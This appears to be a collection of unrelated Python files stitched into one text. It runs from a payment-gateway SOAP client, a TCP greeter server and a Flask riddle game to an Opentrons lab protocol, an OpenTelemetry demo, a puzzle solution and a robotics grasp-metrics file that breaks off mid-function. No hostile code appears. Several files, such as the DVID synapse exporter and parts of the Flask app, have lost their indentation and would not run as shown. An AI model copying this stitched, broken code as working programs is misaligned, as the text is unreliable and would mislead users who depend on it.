    # -k: find all keys holding the given value, shown as flattened paths.
    if args.qval:
        print("findKeys: ", args.qval)
        res = findKeys(dbase, args.qval)
        # printJson(res)
        fileList = stringList(res)
        print("Itemlist:")
        for item in fileList:
            print(item)
    # -o: write the generated dictionary out as a single JSON file.
    if args.outfile:
        writeDict(dbase, args.outfile)
    if VERBOSE > 1:
        print("Complete!")

if __name__ == '__main__':
    main()
from __future__ import absolute_import
from agms.agms import Agms
from agms.request.invoicing_request import InvoicingRequest
from agms.response.invoicing_response import InvoicingResponse
from agms.exception.invalid_request_exception import InvalidRequestException
class Invoicing(Agms):
    """A class representing AGMS Invoice objects.

    Each public method sets the SOAP operation, loads the request
    parameters, executes the call, and returns the response as an array.
    """

    def __init__(self):
        # NOTE(review): Agms.__init__ is not invoked here (matches the
        # original behavior) -- confirm the base class needs no init.
        self.op = None
        self._api_url = 'https://gateway.agms.com/roxapi/AGMS_BillPay.asmx'
        self._requestObject = InvoicingRequest
        self._responseObject = InvoicingResponse

    def customer(self, params):
        """Retrieve the customer ID list."""
        return self._run_op('RetrieveCustomerIDList', params)

    def invoice(self, params):
        """Retrieve invoices."""
        return self._run_op('RetrieveInvoices', params)

    def submit(self, params):
        """Submit an invoice."""
        return self._run_op('SubmitInvoice', params)

    def _run_op(self, op, params):
        # Shared implementation for all three public operations (the
        # original repeated this body verbatim in each method).
        self.op = op
        self._reset_parameters()
        # params is iterated as (name, value) pairs -- presumably a list of
        # 2-tuples or dict.items(); confirm against callers.
        for param, config in params:
            self._set_parameter(param, config)
        self._execute()
        return self.response.to_array()

    def _execute(self):
        """Dispatch self.op to the matching SOAP request/response pair."""
        if self.op == 'RetrieveCustomerIDList':
            self._do_connect('RetrieveCustomerIDList', 'RetrieveCustomerIDListResponse')
        elif self.op == 'RetrieveInvoices':
            self._do_connect('RetrieveInvoices', 'RetrieveInvoicesResponse')
        elif self.op == 'SubmitInvoice':
            self._do_connect('SubmitInvoice', 'SubmitInvoiceResponse')
        else:
            raise InvalidRequestException('Invalid request to Invoicing API ' + self.op)
import socket
# One-shot TCP greeter: accepts connections forever and sends each client a
# thank-you line.
# BUG FIX: socket.AF_NET does not exist (AttributeError at startup); the
# IPv4 address family is AF_INET.
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# BUG FIX: gethostbyname() requires a hostname argument; resolve this
# machine's own name. (The original computed `host` but then bound a
# hard-coded LAN IP, 192.168.1.104.)
host = socket.gethostbyname(socket.gethostname())
port = 444  # NOTE: ports below 1024 usually need elevated privileges
serversocket.bind((host, port))
serversocket.listen(3)
while True:
    clientsocket, address = serversocket.accept()
    print("received connection from %s " % str(address))
    message = "thank you for connecting to the server" + "\r\n"
    clientsocket.send(message.encode("ascii"))
    clientsocket.close()
|
import warnings
warnings.filterwarnings('ignore')
from datasetup.utils import *
from datasetup.data_preprocessing import filterPAR, getPoints
from datasetup.data_segmentation import *
# Input dataset produced by the cleaning step.
data_file = 'exported/Cleaned_Dataset.csv'
""" User Input Declaration:
1. filter_mode = 0 (Don't filter); 1 (Filter TC that passed through PAR)
2. point_mode = 0 (ORIGIN); 1 (ENDPOINT)
3. clustering_mode = 0 (kMeans); 1 (Hierarchical Clustering); 2 (DBSCAN)
"""
# Interactive mode selection is currently disabled; both variants run below.
# filter_mode = input('Filter dataset? \n 0 NO \n 1 YES\n')
# point_mode = input('What data point to use? \n 0 ORIGIN \n 1 ENDPOINT \n')
# clustering_mode = input('What clustering method to use? \n 0 kMeans \n 1 Hierarchical Clustering \n 2 DBSCAN \n')
checkFileType(data_file)
data = openFile(data_file)
data2 = data  # NOTE(review): unused copy -- confirm it can be removed
# Run silhouette analysis twice on ORIGIN points: once on the full dataset,
# once on the PAR-filtered subset.
for i in range(2):
    if i == 1:
        PAR_data = filterPAR(data)
        PAR_ORIGIN = getPoints(PAR_data, 'ORIGIN')
        silhouetteAnalysis(PAR_ORIGIN, "PAR-FILTERED_ORIGIN.png", "FILTERED")
    else:
        NON_data = data
        NON_ORIGIN = getPoints(NON_data, 'ORIGIN')
        silhouetteAnalysis(NON_ORIGIN, "NON-FILTERED_ORIGIN.png", "NON-FILTERED")
|
#!/bin/env
"""
Script that generates body_synapse file using specified annotation datatype with synapes.
lau, 01/16 first version of script
example:
python generate_body_synapses_dvid.py emdata1:8500 44d42 bodies3_annotations mb6_synapses annotations body_synapses_test
"""
# ------------------------- imports -------------------------
import json
import sys
import os
import socket
import datetime
import random
from libdvid import DVIDNodeService, ConnectionMethod
# ------------------------ function to load/post body_synapse to DVID -------------
# Post the assembled body_synapses dict as JSON into the given DVID keyvalue
# instance under key_name.
# (The function name keeps the original "synpase" spelling; callers use it.)
def load_body_synpase_dvid (body_synapses, keyvalue_name, key_name, node_service):
    # json.dumps already returns a str; the extra str() is a harmless no-op.
    data = str(json.dumps(body_synapses))
    node_service.put(keyvalue_name, key_name, data)
    print "Done posting"
#
# dvid_request_url = "http://" + dvid_server + "/api/node/" + dvid_uuid + "/" + keyvalue_name + "/key/" + key_name
#
# res = requests.post(url=dvid_request_url,data=data)
# os.remove(body_synapse_json)
# ------------------------- script start -------------------------
if __name__ == '__main__':
if len(sys.argv) < 6:
print "usage: dvid_server dvid_node_uuid body_annotations_name(keyvalue) annotations_synapses(annotations) annotations_keyvalue(keyvalue) body_synapses_key(key)"
print "ex: python ./generate_body_synapses_dvid.py emdata1:8500 44d42 bodies3_annotations mb6_synapses annotations body_synapses_test"
sys.exit(1)
dvid_server = sys.argv[1]
dvid_uuid = sys.argv[2]
body_annotations_name = sys.argv[3]
annotations_synapses = sys.argv[4]
annotations_keyvalue = sys.argv[5]
body_synapses_key = sys.argv[6]
# Libdvid has problems with trailing slashes in urls
if dvid_server.endswith('/'):
dvid_server = dvid_server[0:-1]
http_dvid_server = "http://{0}".format(dvid_server)
node_service = DVIDNodeService(dvid_server, dvid_uuid, 'umayaml@janelia.hhmi.org', 'generate body synapses')
response = node_service.get_keys(body_annotations_name)
# proxies = {'http': 'http://' + dvid_server + '/'}
# dvid_get_annotated_bodies = "http://" + dvid_server + "/api/node/" + dvid_uuid + "/" + body_annotations_name + "/keys"
# print "dvid_url " + dvid_get_annotated_bodies
# response = urllib.urlopen(dvid_get_annotated_bodies, proxies=proxies).read()
bodies_annot_data = list(response)
group_synapses = []
body_theshold = 0
for key in bodies_annot_data:
if key.isdigit():
#print "key " + key
# key is a bodyID
# get synapses for bodyID like this http://emdata1.int.janelia.org:8500/api/node/44d42/mb6_synapses/label/10095139
get_synapses_dvid = annotations_synapses + "/label/" + key
response_syn = node_service.custom_request( get_synapses_dvid, "", ConnectionMethod.GET )
# get_synapses_dvid = "http://" + dvid_server + "/api/node/" + dvid_uuid + "/" + annotations_synapses + "/label/" + key
# print "get syn: " + get_synapses_dvid
# response_syn = urllib.urlopen(get_synapses_dvid, proxies=proxies).read()
if response_syn == 'null':
print "No synapse data found for bodyID: " + key
else:
print "Found synapse data for bodyID: " + key
body_synapses = {}
#get_body_annot = "http://" + dvid_server + "/api/node/" + dvid_uuid + "/" + body_annotations_name + "/key/"+ key
#response_bod_annot = urllib.urlopen(get_body_annot, proxies=proxies).read()
#body_annot_data = json.loads(response_bod_annot)
#print body_annot_data
synapse_data = json.loads(response_syn)
body_theshold += 1
syn_count = 0
psd_count = 0
tbar_count = 0
all_locations = {}
z_locs = []
for synapse in synapse_data:
syn_count += 1
syn_kind = synapse['Kind']
if syn_kind == 'PreSyn':
tbar_count += 1
if syn_kind == 'PostSyn':
psd_count += 1
syn_pos = synapse['Pos']
syn_z = syn_pos[2]
all_locations[syn_z] = syn_pos
z_locs.append(syn_z)
z_locs.sort()
loc_num = len(z_locs);
mid = int(loc_num/2)
if mid != 0:
z_key = z_locs[mid]
#print "Here " + key + " " + str(syn_count) + " " + str(tbar_count) + " " + str(psd_count) + " locnum " + str(loc_num) + " mid " + str(mid) + " zkey " + str(z_key)
this_loc = all_locations[z_key]
export_synapse_data = {}
export_synapse_data["body ID"] = int(key)
export_synapse_data["body synapses"] = syn_count
export_synapse_data["body PSDs"] = psd_count
export_synapse_data["body T-bars"] = tbar_count
export_synapse_data["location"] = this_loc
text_val = "orphan-link assignment. " + str(syn_count) + " Synapses, " + str(tbar_count) + " T-bars, " + str(psd_count) + " PSDs"
export_synapse_data["text"] = text_val
export_synapse_data["body threshold"] = body_theshold
group_synapses.append(export_synapse_data)
print "Done going through bodyIDs"
syn_body_metadata = {}
syn_body_metadata['username'] = "flyem"
syn_body_metadata['description'] = "bookmarks"
syn_body_metadata['coordinate system'] = "dvid"
syn_body_metadata['software'] = "generate_body_synapses_dvid.py"
syn_body_metadata['software version'] = "1.0.0"
syn_body_metadata['file version'] = 1
syn_body_metadata['session path'] = os.getcwd()
syn_body_metadata['computer'] = socket.gethostname()
syn_body_metadata['date'] = datetime.datetime.now().strftime("%d-%B-%Y %H:%M")
final_json_export = {}
final_json_export['data'] = group_synapses
final_json_export['metadata'] = syn_body_metadata
load_body_synpase_dvid (final_json_export, annotations_keyvalue, body_synapses_key, node_service)
sys.exit(1)
|
import os
import json
from datetime import datetime
from random import shuffle
from flask import Flask, session, redirect, url_for, request, render_template, jsonify
# Custom .py
import helper.helper as helper
import riddles.riddle as riddle
app = Flask(__name__)
# Session signing key; must be set in the environment for sessions to work.
app.config['SECRET_KEY'] = os.environ.get("SECRET_KEY")

@app.route('/')
def index():
    """Landing page listing the members from the app data file."""
    app_data = helper.read_json('data/system/app_data.json')
    # Only the members list of the (hard-coded) "1.4" entry is displayed.
    app_data = app_data['1.4'][0]["members"]
    # Render index.html by default
    return render_template("index.html", members=app_data, page_title="Riddle Game")
""" Create profile """
@app.route('/<user_name>/create_profile', methods=["POST"])
def create_profile(user_name):
return helper.create_profile_data(user_name)
""" Log in """
@app.route('/<user_name>/log_in', methods=["GET"])
def log_in(user_name):
profiles = helper.read_txt("data/profiles/all-profiles.txt")
profile = user_name.lower() + "\n"
if profile in profiles:
session['user'] = {'user_name': user_name}
return jsonify(helper.read_json(f"data/profiles/{user_name}/{user_name}.json"))
else:
return jsonify("no profile")
""" Log out """
@app.route('/logout')
def logout():
session.pop('user')
return redirect(url_for('index'))
""" Riddles Game Setting """
@app.route('/<user_name>/riddle-g-setting')
def riddle_setting(user_name):
if 'user' in session:
if user_name == session['user']['user_name']:
riddle_profiles = helper.read_txt(
f"data/profiles/{user_name}/riddle_game/riddle_profiles.txt")
else:
return redirect(url_for('index'))
else:
return redirect(url_for('index'))
return render_template("riddle-g-setting.html",
user_name=user_name, riddle_profiles=riddle_profiles, page_title="Riddle Game Setting")
# JSON requests to create save
@app.route('/postjson/<user_name>/riddle-g-setting', methods=["POST"])
def parse_setting(user_name):
    """Create a new riddle game unless the profile name is already taken."""
    data = request.get_json(force=True)
    profiles = helper.read_txt(
        f"data/profiles/{user_name}/riddle_game/riddle_profiles.txt")
    # Profile names are stored one per line, hence the trailing newline.
    profile = data["riddle_game_data"]["riddle_profile_name"] + "\n"
    finished_games = helper.read_txt(
        f"data/profiles/{user_name}/riddle_game/finished_riddles.txt")
    if profile in profiles or profile in finished_games:
        # Name collision: echo the name back instead of creating a game.
        return jsonify(profile)
    # Create new game
    riddle.create_riddle_game(data)
    return jsonify(data)
""" Riddles Game """
@app.route('/<user_name>/<riddle_profile>/riddle-game', methods=["GET"])
def get_results(user_name, riddle_profile):
if 'user' in session:
if user_name == session['user']['user_name']:
riddle_profiles = helper.read_txt(
f"data/profiles/{user_name}/riddle_game/riddle_profiles.txt")
profile = helper.read_json(
helper.profile(user_name, riddle_profile))
profile = profile["game"][0]
if profile["mods"] == "limited":
return render_template("riddle-game.html",
user_name=user_name,
riddle_profiles=riddle_profiles,
riddle_profile=riddle_profile,
tries=int(profile["tries"]),
page_title="Riddle Game")
else:
# Render riddle-game template by default
return render_template("riddle-game.html",
user_name=user_name,
riddle_profiles=riddle_profiles,
riddle_profile=riddle_profile,
tries=int(0),
page_title="Riddle Game")
return redirect(url_for('index'))
# JSON POST to play the game
@app.route('/postjson/<user_name>/<riddle_profile>/riddle-game', methods=["POST", "GET"])
def parse_answer(user_name, riddle_profile):
    """Game-play endpoint.

    POST dispatches on the payload's "id" field: "answer" submits an
    answer, "skip_question" skips, anything else deletes the question.
    GET returns the profile's current saved game state.
    """
    # Main POST request for riddle-game
    if request.method == "POST":
        post_data = request.get_json(force=True)
        if post_data["id"] == "answer":
            data = riddle.riddle_game(user_name, riddle_profile, post_data)
            return jsonify(data)
        elif post_data["id"] == "skip_question":
            data = riddle.skip_question(user_name, riddle_profile)
            return jsonify(data)
        else:
            data = riddle.delete_question(user_name, riddle_profile)
            return jsonify(data)
    # GET: return the profile's saved game state.
    data = helper.read_json(helper.profile(user_name, riddle_profile))
    return jsonify(data)

# Statistics for Riddle game
@app.route('/<user_name>/statistics', methods=["GET"])
def show_statistics(user_name):
    """Statistics page: top-10 profiles by right answers; session-guarded."""
    if 'user' in session:
        if user_name == session['user']['user_name']:
            user_profile = helper.read_json(
                f"data/profiles/{user_name}/{user_name}.json")
            finished_games = user_profile[f"{user_name}"][0]["finished_riddles"]
            riddle_profiles = helper.read_txt(
                f"data/profiles/{user_name}/riddle_game/riddle_profiles.txt")
            statistics = helper.read_json("data/riddle-game/statistics.json")
            # Rank all profiles by right answers, best first.
            statistics = sorted(statistics['profiles'],
                                key=lambda k: k['right_answers'], reverse=True)
            return render_template("statistics.html",
                                   finished_games=finished_games,
                                   riddle_profiles=riddle_profiles,
                                   user_name=user_name,
                                   statistics=statistics[:10],
                                   page_title="Statistics")
    return redirect(url_for('index'))
""" Errors """
# 404
@app.errorhandler(404)
def page_not_found(e):
helper.write_to_txt("data/system/error-log.txt", "a", f"{e}" + '\n')
return render_template('404.html'), 404
# 500
@app.errorhandler(500)
def internal_server_error(e):
helper.write_to_txt("data/system/error-log.txt", "a", f"{e}" + '\n')
return render_template('500.html'), 500
""" App data """
@app.route('/app_data')
def get_app_data():
app_data = helper.read_json('data/app_data.json')
return jsonify(app_data)
if __name__ == '__main__':
app.run(host=os.getenv('IP'),
port=os.getenv('PORT'),
debug=os.environ.get("DEVELOPMENT"))
|
from general.utils import MyTask
import numpy as np
class Classifier(MyTask):
    """Base class for classifiers that feed 2-D (samples x features) data
    to a backend model.

    Subclasses implement the underscore-prefixed hooks; the public methods
    flatten the input to 2-D first via _reshape().
    """

    def createmodel(self, inputsize, outputsize, update_model=False):
        """Create the backend model, inferring the flattened input shape
        from a zero-filled dummy sample."""
        tmpsample = np.array([np.zeros(inputsize)])
        newshape = self._reshape(tmpsample).shape[1:]
        return self._createmodel(newshape, outputsize, update_model=update_model)

    def train(self, trainset, trainlabel):
        return self._train(self._reshape(trainset), trainlabel)

    def evaluate(self, testset, testlabel):
        return self._evaluate(self._reshape(testset), testlabel)

    def predict(self, testset):
        return self._predict(self._reshape(testset))

    def predict_classes(self, testset):
        return self._predict_classes(self._reshape(testset))

    def setWeight(self, weight):
        # Stores weights for subclasses that use them.
        self.weight = weight

    def _reshape(self, data):
        """Collapse `data` to 2-D (samples, features)."""
        if len(data.shape) == 2:
            return data
        if len(data.shape) == 1:
            # BUG FIX: the original `raise`d the reshaped array, which is a
            # TypeError at runtime; return it instead.
            return np.reshape(data, (data.shape[0], 1))
        return np.reshape(data, (data.shape[0], data.shape[1] * data.shape[2]))

    # Backend hooks to be provided by concrete subclasses.
    def _createmodel(self, inputsize, outputsize, update_model=False):
        raise NotImplementedError

    def _train(self, trainset, trainlabel):
        raise NotImplementedError

    def _evaluate(self, testset, testlabel):
        raise NotImplementedError

    def _predict(self, testset):
        raise NotImplementedError

    def _predict_classes(self, testset):
        raise NotImplementedError
|
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 16 11:11:23 2020
@author: Administrator
"""
import os
path = r'C:\Users\Administrator\Desktop'
os.chdir(path)

# Database name to inject into the SQL dump.
name = 'rsrp_grid50'

with open('rsrp_grid_09.sql', encoding='utf-8') as f:
    content = f.readlines()

# Find the position just after the (last) 'SET FOREIGN_KEY_CHECKS=0;' line.
no = None
for i, line in enumerate(content):
    if 'SET FOREIGN_KEY_CHECKS=0;' in line:
        no = i + 1
if no is None:
    # BUG FIX: the original crashed with NameError when the marker was
    # missing; fail with a clear message instead.
    raise ValueError("marker 'SET FOREIGN_KEY_CHECKS=0;' not found in input SQL")

# Inserted in reverse so the final file order is DROP, CREATE, USE.
content.insert(no, 'USE {};\n'.format(name))
content.insert(no, 'CREATE DATABASE IF NOT EXISTS {};\n'.format(name))
content.insert(no, 'DROP DATABASE IF EXISTS {};\n'.format(name))

with open('rsrp_grid_09_1.sql', 'w', encoding='utf-8') as f:
    # Write all lines in one call (the original looped calling writelines
    # once per line).
    f.writelines(content)
from django.contrib import admin
from .models import Winery, Wine, Grape, County, Comment
# Register your models here.
# Expose the wine-catalog models in the Django admin.
admin.site.register(Winery)
admin.site.register(Wine)
admin.site.register(Grape)
# NOTE(review): County is imported above but never registered -- confirm
# whether it should also appear in the admin.
admin.site.register(Comment)
from opentrons import protocol_api
# Standard Opentrons protocol metadata block.
metadata = {'apiLevel': '2.2',
            'protocolName': 'Clip Template v2',
            'author': 'Gabrielle Johnston',
            'description': 'DNABot updated clip template'}

def run(protocol: protocol_api.ProtocolContext):
    """Protocol entry point: defines clip() and invokes it with clips_dict."""

    def clip(
            prefixes_wells,
            prefixes_plates,
            suffixes_wells,
            suffixes_plates,
            parts_wells,
            parts_plates,
            parts_vols,
            water_vols,
            tiprack_type='opentrons_96_tiprack_10ul',
            p10_mount='right',
            p10_type='p10_single',
            well_plate_type='biorad_96_wellplate_200ul_pcr',
            tube_rack_type='opentrons_24_tuberack_nest_1.5ml_snapcap'):
        """Implements linker ligation reactions using an opentrons OT-2."""
        # Constants
        INITIAL_TIP = 'A1'
        CANDIDATE_TIPRACK_SLOTS = ['3', '6', '9']
        PIPETTE_TYPE = p10_type
        # PIPETTE_MOUNT = 'right'
        PIPETTE_MOUNT = p10_mount
        # SOURCE_PLATE_TYPE = 'biorad_96_wellplate_200ul_pcr'
        SOURCE_PLATE_TYPE = well_plate_type
        # DESTINATION_PLATE_TYPE = 'biorad_96_wellplate_200ul_pcr'
        DESTINATION_PLATE_TYPE = well_plate_type
        DESTINATION_PLATE_POSITION = '1'
        # TUBE_RACK_TYPE = 'opentrons_24_tuberack_nest_1.5ml_snapcap'
        TUBE_RACK_TYPE = tube_rack_type
        TUBE_RACK_POSITION = '4'
        MASTER_MIX_WELL = 'A1'
        WATER_WELL = 'A2'
        INITIAL_DESTINATION_WELL = 'A1'
        MASTER_MIX_VOLUME = 20
        # Settings passed to pipette.mix() for linkers and parts below.
        LINKER_MIX_SETTINGS = (4, 10)
        PART_MIX_SETTINGS = (4, 10)

        # Tiprack slots
        # Four tip pickups per clip reaction: master mix, prefix, suffix, part.
        total_tips = 4 * len(parts_wells)
        letter_dict = {'A': 0, 'B': 1, 'C': 2,
                       'D': 3, 'E': 4, 'F': 5, 'G': 6, 'H': 7}
        initial_destination_well_index = letter_dict[INITIAL_DESTINATION_WELL[0]]*12 \
            + int(INITIAL_DESTINATION_WELL[1]) - 1
        # Tips remaining in the first rack from the starting tip onwards.
        tiprack_1_tips = (
            13 - int(INITIAL_TIP[1:])) * 8 - letter_dict[INITIAL_TIP[0]]
        if total_tips > tiprack_1_tips:
            tiprack_num = 1 + (total_tips - tiprack_1_tips) // 96 + \
                (1 if (total_tips - tiprack_1_tips) % 96 > 0 else 0)
        else:
            tiprack_num = 1
        slots = CANDIDATE_TIPRACK_SLOTS[:tiprack_num]
        # Load every distinct source plate once, keyed by deck slot.
        source_plates = {}
        source_plates_keys = list(set((
            prefixes_plates + suffixes_plates + parts_plates)))
        for key in source_plates_keys:
            source_plates[key] = protocol.load_labware(SOURCE_PLATE_TYPE, key)
        tipracks = [protocol.load_labware(tiprack_type, slot)
                    for slot in slots]
        if PIPETTE_TYPE != 'p10_single':
            print('Define labware must be changed to use', PIPETTE_TYPE)
            exit()
        pipette = protocol.load_instrument('p10_single', PIPETTE_MOUNT,
                                           tip_racks=tipracks)
        pipette.flow_rate.aspirate = 20
        #pipette.pick_up_tip(tipracks[0].well(INITIAL_TIP))
        destination_plate = protocol.load_labware(
            DESTINATION_PLATE_TYPE, DESTINATION_PLATE_POSITION)
        tube_rack = protocol.load_labware(TUBE_RACK_TYPE, TUBE_RACK_POSITION)
        master_mix = tube_rack.wells_by_name()[MASTER_MIX_WELL]
        water = tube_rack.wells_by_name()[WATER_WELL]
        #destination_wells = destination_plate.wells(
        #INITIAL_DESTINATION_WELL, length=int(len(parts_wells)))
        # One destination well per clip reaction, starting at the initial well.
        destination_wells = destination_plate.wells()[
            initial_destination_well_index:(
                initial_destination_well_index + int(len(parts_wells)))]

        # Transfers
        # Master mix into every destination well using a single tip.
        #pipette.pick_up_tip()
        pipette.pick_up_tip(tipracks[0].well(INITIAL_TIP))
        pipette.transfer(MASTER_MIX_VOLUME, master_mix,
                         destination_wells, new_tip='never', touch_tip=True,
                         blow_out=True)
        pipette.drop_tip()
        # Water with a fresh tip per well.
        pipette.transfer(water_vols, water,
                         destination_wells, touch_tip=True,
                         new_tip='always')
        for clip_num in range(len(parts_wells)):
            # Prefix linker: 1 unit, with Z speed limited while in liquid.
            prefix_wells = [prefix_well.bottom() for prefix_well in
                            source_plates[prefixes_plates[clip_num]].wells(
                                prefixes_wells[clip_num])]
            for prefix_well in prefix_wells:
                pipette.pick_up_tip()
                pipette.move_to(prefix_well)
                protocol.max_speeds['Z'] = 10
                pipette.aspirate(1, prefix_well)
                pipette.move_to(destination_wells[clip_num].top())
                protocol.max_speeds['Z'] = None
                pipette.dispense(1, destination_wells[clip_num])
                pipette.touch_tip(destination_wells[clip_num])
                pipette.mix(LINKER_MIX_SETTINGS[0], LINKER_MIX_SETTINGS[1],
                            destination_wells[clip_num])
                pipette.drop_tip()
            # Suffix linker, handled the same way as the prefix.
            suffix_wells = [suffix_well.bottom() for suffix_well in
                            source_plates[suffixes_plates[clip_num]].wells(
                                suffixes_wells[clip_num])]
            for suffix_well in suffix_wells:
                pipette.pick_up_tip()
                pipette.move_to(suffix_well)
                protocol.max_speeds['Z'] = 10
                pipette.aspirate(1, suffix_well)
                pipette.move_to(destination_wells[clip_num].top())
                protocol.max_speeds['Z'] = None
                pipette.dispense(1, destination_wells[clip_num])
                pipette.touch_tip(destination_wells[clip_num])
                pipette.mix(LINKER_MIX_SETTINGS[0], LINKER_MIX_SETTINGS[1],
                            destination_wells[clip_num])
                pipette.drop_tip()
            # DNA part: per-clip volume from parts_vols.
            part_wells = [part_well.bottom() for part_well in
                          source_plates[parts_plates[clip_num]].wells(
                              parts_wells[clip_num])]
            for part_well in part_wells:
                pipette.pick_up_tip()
                pipette.move_to(part_well)
                protocol.max_speeds['Z'] = 10
                pipette.aspirate(parts_vols[clip_num], part_well)
                pipette.move_to(destination_wells[clip_num].top())
                protocol.max_speeds['Z'] = None
                pipette.dispense(parts_vols[clip_num],
                                 destination_wells[clip_num])
                pipette.touch_tip(destination_wells[clip_num])
                pipette.mix(PART_MIX_SETTINGS[0], PART_MIX_SETTINGS[1],
                            destination_wells[clip_num])
                pipette.drop_tip()

    # NOTE(review): clips_dict, p10_mount, p10_type, well_plate_type and
    # tube_rack_type are not defined in this file -- presumably injected by
    # the DNABot template generator before upload; confirm.
    clip(**clips_dict, p10_mount=p10_mount, p10_type=p10_type, well_plate_type=well_plate_type, tube_rack_type=tube_rack_type)
|
# Copyright 2021 Google
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from opentelemetry import trace
from opentelemetry.exporter.cloud_trace import CloudTraceSpanExporter
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchExportSpanProcessor
from opentelemetry.trace import Link

# Demo script: configure OpenTelemetry to export spans to Google Cloud
# Trace, then create spans carrying attributes, events, and links.
trace.set_tracer_provider(TracerProvider())
cloud_trace_exporter = CloudTraceSpanExporter()
trace.get_tracer_provider().add_span_processor(
    # BatchExportSpanProcessor buffers spans and sends them in batches in a
    # background thread.
    BatchExportSpanProcessor(cloud_trace_exporter)
)
tracer = trace.get_tracer(__name__)

# Adding attributes to spans: one attribute per supported primitive type.
with tracer.start_as_current_span("foo_with_attribute") as current_span:
    current_span.set_attribute("string_attribute", "str")
    current_span.set_attribute("bool_attribute", False)
    current_span.set_attribute("int_attribute", 3)
    current_span.set_attribute("float_attribute", 3.14)

# Adding events to spans (an event with a name and no attributes).
with tracer.start_as_current_span("foo_with_event") as current_span:
    current_span.add_event(name="event_name",)

# Adding links to spans
with tracer.start_as_current_span("link_target") as link_target:
    # Creates a span "span_with_link" and a link from
    # "span_with_link" -> "link_target"
    with tracer.start_as_current_span(
        "span_with_link", links=[Link(link_target.context)]
    ):
        pass

    # Creates a span "span_with_link" and a link from
    # "span_with_link" -> "link_target". This link also has the attribute
    # {"link_attr": "string"}
    with tracer.start_as_current_span(
        "span_with_link_and_link_attributes",
        links=[Link(link_target.context, attributes={"link_attr": "string"})],
    ):
        pass

# You can also do a combination of these: an event plus an attribute.
with tracer.start_as_current_span(
    "foo_with_event_and_attributes"
) as current_span:
    current_span.add_event(name="event_name", attributes={"event_attr1": 123})
    current_span.set_attribute("bool_attribute", False)
|
def reduce(polymer):
    """Fully react a polymer, removing adjacent opposite-polarity pairs.

    Two units react (and vanish) when they are the same letter in opposite
    case, e.g. 'a'/'A' — their ASCII codes differ by exactly 32.

    Parameters
    ----------
    polymer : list of str
        Single-character units. Unlike the original implementation the
        input list is not mutated; a new list is returned.

    Returns
    -------
    list of str
        The fully reduced polymer.
    """
    # Single-pass stack algorithm: O(n) instead of repeatedly rescanning
    # the list and deleting pairs in place (worst-case quadratic).
    stack = []
    for unit in polymer:
        # React with the top of the stack when letters match but case differs.
        if stack and abs(ord(stack[-1]) - ord(unit)) == 32:
            stack.pop()
        else:
            stack.append(unit)
    return stack
if __name__ == '__main__':
    # The polymer is the first (and only) line of the puzzle input.
    with open('day5input.txt') as handle:
        raw = handle.readline().strip()

    print('Part 1: ')
    reduced = reduce(list(raw))
    print(len(reduced))

    print('Part 2: ')
    # For each unit type, remove it (both cases) from the already-reduced
    # polymer, reduce again, and report the shortest result.
    best = min(
        len(reduce([unit for unit in reduced if unit.lower() != letter]))
        for letter in "abcdefghijklmnopqrstuvwxyz"
    )
    print(best)
|
# Echo somecode.txt while translating parentheses to square brackets:
# '(' -> '[', ')' -> ']', every other character unchanged.
# Fixed: the file handle was never closed — a context manager now
# guarantees it is, even if printing fails part-way.
with open("somecode.txt", 'r') as fi:
    print('hi')
    # Iterate the file object directly instead of materialising readlines().
    for line in fi:
        for symbol in line:
            if symbol == '(':
                print('[', end='')
            elif symbol == ')':
                print(']', end='')
            else:
                print(symbol, end='')
#!/usr/bin/env python -W ignore::DeprecationWarning
"""
Grasp Metrics for EE106B grasp planning lab
Author: Chris Correa
"""
# may need more imports
import numpy as np
from lab2.utils import vec, adj, look_at_general, hat
import cvxpy as cvx
import math
import scipy
def compute_force_closure(vertices, normals, num_facets, mu, gamma, object_mass, gripper_min_width, gripper_max_width):
    """
    Binary force-closure check for a two-finger antipodal grasp, using the
    line method from HW2: the grasp is accepted when the finger separation
    fits the gripper and, at each contact, the line between the two contact
    points lies inside that contact's friction cone.

    Parameters
    ----------
    vertices : 2x3 :obj:`numpy.ndarray`
        obj mesh vertices on which the fingers will be placed
    normals : 2x3 :obj:`numpy.ndarray`
        obj mesh normals at the contact points
    num_facets : int
        number of friction-cone boundary vectors (unused by the line method,
        kept for API compatibility)
    mu : float
        coefficient of friction
    gamma : float
        torsional friction coefficient (unused by this metric)
    object_mass : float
        mass of the object (unused by this metric)

    Returns
    -------
    float : 1 if the grasp is force closure, otherwise 0
    """
    separation = vertices[1] - vertices[0]
    width = np.linalg.norm(separation)

    # The fingers must be able to physically reach both contact points.
    if not (gripper_min_width <= width <= gripper_max_width):
        return 0

    cone_half_angle = abs(np.arctan(mu))
    for contact in (0, 1):
        # Direction from this contact toward the opposite one.
        toward_other = vertices[1 - contact] - vertices[contact]
        cos_angle = np.dot(normals[contact], toward_other) / (
            np.linalg.norm(normals[contact]) * np.linalg.norm(toward_other))
        # The grasp line must lie strictly inside the friction cone.
        if abs(np.arccos(cos_angle)) >= cone_half_angle:
            return 0
    return 1
def get_grasp_map(vertices, normals, num_facets, mu, gamma):
    """
    defined in the book on page 219. Compute the grasp map given the contact
    points and their surface normals

    Parameters
    ----------
    vertices : 2x3 :obj:`numpy.ndarray`
        obj mesh vertices on which the fingers will be placed
    normals : 2x3 :obj:`numpy.ndarray`
        obj mesh normals at the contact points
    num_facets : int
        number of vectors to use to approximate the friction cone. these vectors
        will be along the friction cone boundary
    mu : float
        coefficient of friction
    gamma : float
        torsional friction coefficient

    Returns
    -------
    :obj:`numpy.ndarray` grasp map, 6x8 (two soft-finger contacts with a
    4-dimensional wrench basis each)
    """
    # Soft-finger wrench basis: forces along the contact x/y/z axes plus a
    # torque about the contact normal. Identical for both contacts (the
    # original defined it twice as B1/B2 with the same values).
    B = np.array([[1, 0, 0, 0],
                  [0, 1, 0, 0],
                  [0, 0, 1, 1],
                  [0, 0, 0, 0],
                  [0, 0, 0, 0],
                  [0, 0, 0, 1]])

    G = np.zeros((6, 8))
    for contact in range(2):
        # Homogeneous transform built from this contact's normal and position.
        # NOTE(review): using hat(normal) as the 3x3 rotation block is unusual
